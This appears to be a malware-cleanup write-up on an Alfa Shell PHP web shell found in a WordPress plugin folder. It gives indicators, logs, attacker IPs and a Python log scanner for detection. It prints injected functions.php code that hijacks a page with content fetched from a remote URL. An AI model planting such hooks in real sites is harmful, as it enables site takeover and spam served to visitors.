If a website contains this file, it was most likely compromised: the file is a tool attackers use to exploit the entire server.
lock.php is a well-known PHP web shell called Alfa Shell, version 4.1. It’s one of the most feature-rich and widely deployed shells in the wild, commonly dropped onto compromised WordPress sites.
Key notes:
- Attackers often regain access using backdoors, so a thorough cleanup is recommended.
- SEO spam can affect and corrupt Google search results.
- WordPress admin access is often exploited, so consider resetting user passwords.
- The functions.php file could be compromised with injected PHP code that hijacks page rendering when a specific URL condition is met:
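```php
// Injected hook: runs before WordPress renders the requested template.
add_action('template_redirect', function() {
    // Only the page with the slug "all-events" is hijacked.
    if (is_page('all-events')) {
        // Replacement page content is fetched from a remote URL on every request.
        $html = file_get_contents('https://raw.githubusercontent.com/harleytou121-ctrl/lp/refs/heads/main/sgladang.txt');
        if ($html !== false) {
            echo $html;
        } else {
            echo "Gagal memuat halaman."; // Indonesian: "Failed to load the page."
        }
        exit; // The legitimate page is never rendered.
    }
});
```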
File location: /wp-content/plugins/pwnd/lock.php
Other files:
/wp-content/plugins/pwnd/ahay.php
/wp-content/plugins/pwnd/pwnd.php
Malicious URLs:
https://raw.githubusercontent.com/harleytou121-ctrl/lp/refs/heads/main/sgladang.txt
Type: PHP web shell
Identification: Alfa Shell v4.1 (XXVI)
Gist: https://gist.github.com/magefix/fa37b8b14393b4f13a9c62558f291395
Sample logs:
[24/May/2026:04:22:28 -0400] "POST /wp-content/plugins/pwnd/lock.php HTTP/2.0" 200 11944 "/wp-content/plugins/pwnd/lock.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
[23/May/2026:14:55:03 -0400] "POST /wp-content/plugins/pwnd/jancox/alfacgiapi/perl.alfa HTTP/2.0" 200 28 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)"
Malicious IPs involved in this attack: 194.233.78.2, 152.42.226.61, 182.8.66.218.
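An added example, not code from the original write-up: a Python scan of access-log lines for the paths listed on this page, normalising percent-encoding, letter case and query strings so that variant requests to the same file are grouped together. The function names and the SAMPLE lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Timestamp, request line, status; tolerates typographic quotes and leading fields.
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\]\s+["\u201c][A-Z]+\s+(?P<target>\S+)'
    r'\s+HTTP/[\d.]+["\u201d]\s+(?P<status>\d{3})'
)

# Indicators taken from this page: the dropped plugin directory and the Alfa CGI path.
INDICATORS = [
    ("pwnd plugin directory", re.compile(r"^/wp-content/plugins/pwnd/")),
    ("Alfa CGI helper", re.compile(r"/alfacgiapi/|\.alfa$")),
]

def normalise(target):
    """Drop the query string, percent-decode, lowercase, collapse slashes."""
    path = unquote(target.split("?", 1)[0]).lower()
    return re.sub(r"/{2,}", "/", path)

def find_shell_hits(lines):
    """Map each matching path to its reasons, hit count, 200s, first/last seen."""
    hits = defaultdict(lambda: {"reasons": set(), "count": 0, "ok": 0,
                                "first": None, "last": None})
    for m in filter(None, map(LINE_RE.search, lines)):
        path = normalise(m["target"])
        reasons = {name for name, rx in INDICATORS if rx.search(path)}
        if not reasons:
            continue
        h = hits[path]
        h["reasons"] |= reasons
        h["count"] += 1
        h["ok"] += int(m["status"] == "200")  # 200: the file exists and answered
        h["first"] = h["first"] or m["ts"]
        h["last"] = m["ts"]
    return dict(hits)

# Constructed sample lines in the log format shown above (not real traffic).
SAMPLE = [
    '[24/May/2026:04:22:28 -0400] "POST /wp-content/plugins/pwnd/lock.php HTTP/2.0" 200 11944 "-" "UA"',
    '[24/May/2026:04:23:01 -0400] "POST /wp-content/plugins/PWND/lock%2Ephp?x=1 HTTP/2.0" 200 512 "-" "UA"',
    '[24/May/2026:04:25:10 -0400] "POST /wp-content/plugins/pwnd/jancox/alfacgiapi/perl.alfa HTTP/2.0" 404 28 "-" "UA"',
    '[24/May/2026:04:26:00 -0400] "GET /wp-login.php HTTP/2.0" 200 4096 "-" "UA"',
]

if __name__ == "__main__":
    for path, h in find_shell_hits(SAMPLE).items():
        print(path, h["count"], h["ok"], sorted(h["reasons"]), h["first"], h["last"])
```

A path with a non-zero count of 200 responses means the file was present and answering at that time, so the first-seen timestamp is a starting point for checking what else changed on disk.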